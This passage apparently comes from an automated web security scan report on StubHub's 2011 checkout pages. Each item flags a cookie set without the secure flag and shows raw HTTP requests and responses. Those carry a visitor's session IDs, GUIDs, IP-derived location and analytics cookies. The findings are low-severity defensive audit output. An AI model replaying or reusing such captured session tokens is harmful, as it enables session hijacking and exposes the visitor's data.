mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:27 GMT
Server: Apache
Set-Cookie: TLTHID=D4150DD639C110390234E07390B95A9D; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

2.6. https://buy.stubhub.com/checkout/checkoutsignin.signin.signinform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.signinform

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/checkoutsignin.signin.signinform HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:52 GMT
Server: Apache
Set-Cookie: TLTHID=E2F6699439C1103903A6999880D0EEFC; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 17d2#1991/checkout/checkoutsignin.signin.signinform@srwp01byx002.stubprod.com
com-stubhub-dye: 17d2#1991/checkout/checkoutsignin.signin.signinform@srwp01byx002.stubprod.com
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2.7. https://buy.stubhub.com/checkout/resources/mojito/css/common/stubtool.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/resources/mojito/css/common/stubtool.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/resources/mojito/css/common/stubtool.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=FBAC0A8439C11039000B8921C8DA47EC; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":9,"to":5,"c":"https://buy.stubhub.com/checkout/checkout","lc":{"d1":{"v":9,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856625066,"l":"en","i":-1}

Response

HTTP/1.1 404 Not Found
Date: Wed, 16 Feb 2011 11:44:28 GMT
Server: Apache
Set-Cookie: TLTHID=1C7871DA39C21039A743871236610E4F; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=1598
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /checkout/resources/mojito/css/common/stubtool.css wa
...[SNIP]...

2.8. https://buy.stubhub.com/checkout/services/delivery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/delivery

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/delivery HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E4093A0A39C110390346A44E82BE9735; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1c55#1991/checkout/services/delivery@srwp01byx003.stubprod.com
com-stubhub-dye: 1c55#1991/checkout/services/delivery@srwp01byx003.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/errorAjax.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2.9. https://buy.stubhub.com/checkout/services/payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/payment

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/payment HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E43BE44639C11039023DF003EA6CA026; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#503/checkout/services/payment@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#503/checkout/services/payment@srwp01byx010.stubprod.com
Location: https://myaccount.stubhub.com/login/Signin
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2.10. https://buy.stubhub.com/checkout/services/reviewSubmit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/reviewSubmit

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/reviewSubmit HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; 